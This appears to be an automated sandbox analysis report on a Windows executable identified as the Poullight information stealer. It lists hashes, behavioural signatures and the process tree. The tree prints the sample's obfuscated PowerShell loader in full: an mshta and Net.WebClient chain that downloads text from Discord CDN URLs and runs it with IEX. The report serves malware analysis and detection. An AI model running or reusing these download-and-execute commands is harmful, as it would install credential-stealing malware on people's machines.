Analysis

  • max time kernel
    42s
  • max time network
    135s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    17-08-2021 03:10

General

  • Target

    eufive_20210816-144801.exe

  • Size

    482KB

  • MD5

    5ba895fb23729ffbb001e5dfe74aa132

  • SHA1

    7a2b094329f369ff5a67971c3a71c46775e93000

  • SHA256

    7fc66f244e022341520c4af91172ec3833c36b95624ee5c510086cd8d71db7ae

  • SHA512

    34ad4a38eb4983018e1c626550378ef4622be2fb02b74d1bacf9155cc835fb838a092c53b5b46e1ee45eac4ba13e723e661bb5e969480a56d2839d14d79c8cde

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/875404916150116402/875405053467459594/Minutes.txt

Signatures

  • Poullight

    Poullight is an information stealer first seen in March 2020.

  • Poullight Stealer Payload 3 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\eufive_20210816-144801.exe
    "C:\Users\Admin\AppData\Local\Temp\eufive_20210816-144801.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1672
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://cdn.discordapp.com/attachments/875404916150116402/875405147503751198/Sekonds.txt
      2⤵
      • Blocklisted process makes network request
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:1900
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://cdn.discordapp.com/attachments/875404916150116402/875405053467459594/Minutes.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFBBBBBBBBBBBBBBHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('BBBBBBBBBBBBBBHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:868
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:296

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/296-73-0x0000000000400000-0x0000000000420000-memory.dmp
    Filesize

    128KB

  • memory/296-77-0x0000000004C60000-0x0000000004C61000-memory.dmp
    Filesize

    4KB

  • memory/296-75-0x0000000000400000-0x0000000000420000-memory.dmp
    Filesize

    128KB

  • memory/296-74-0x000000000041A94E-mapping.dmp
  • memory/868-68-0x000000001AA74000-0x000000001AA76000-memory.dmp
    Filesize

    8KB

  • memory/868-65-0x000000001AAF0000-0x000000001AAF1000-memory.dmp
    Filesize

    4KB

  • memory/868-66-0x00000000023A0000-0x00000000023A1000-memory.dmp
    Filesize

    4KB

  • memory/868-67-0x000000001AA70000-0x000000001AA72000-memory.dmp
    Filesize

    8KB

  • memory/868-69-0x0000000001EB0000-0x0000000001EB1000-memory.dmp
    Filesize

    4KB

  • memory/868-70-0x000000001B700000-0x000000001B701000-memory.dmp
    Filesize

    4KB

  • memory/868-71-0x000000001C5C0000-0x000000001C5C1000-memory.dmp
    Filesize

    4KB

  • memory/868-72-0x0000000002470000-0x000000000247E000-memory.dmp
    Filesize

    56KB

  • memory/868-64-0x0000000002620000-0x0000000002621000-memory.dmp
    Filesize

    4KB

  • memory/868-63-0x000007FEFC221000-0x000007FEFC223000-memory.dmp
    Filesize

    8KB

  • memory/868-62-0x0000000000000000-mapping.dmp
  • memory/1672-59-0x0000000000830000-0x0000000000831000-memory.dmp
    Filesize

    4KB

  • memory/1900-61-0x0000000000000000-mapping.dmp